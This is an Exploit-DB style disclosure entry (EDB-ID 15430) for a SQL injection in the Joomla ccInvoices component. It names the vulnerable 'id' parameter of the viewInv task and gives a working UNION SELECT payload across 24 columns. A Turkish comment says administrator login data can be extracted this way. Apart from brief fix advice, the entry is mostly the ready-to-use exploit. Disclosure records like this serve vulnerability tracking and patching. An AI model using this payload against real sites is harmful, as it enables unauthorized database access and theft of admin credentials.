Joomla! Component ccInvoices - SQL Injection

EDB-ID:

15430


Author:

FL0RiX

Type:

webapps


Platform:

PHP

Date:

2010-11-05


<------------------- header data start ------------------- >
#############################################################
Joomla Component ccinvoices SQL Injection Vulnerability                                      
#############################################################

# Author        : Fl0riX ~ Bug Researchers

# Name : Joomla com_ccinvoices

# Bug Type : SQL injection

# Infection : Admin Login Bilgileri Alinabilir.

# Vendor: http://www.chillcreations.com/

# Demo Vuln :
[+]index.php?option=com_ccinvoices&task=viewInv&id=[EXPLOIT]

# Note: register in site & Login with ur account.

# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
null+and+1=0+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
< -- bug code end of -- >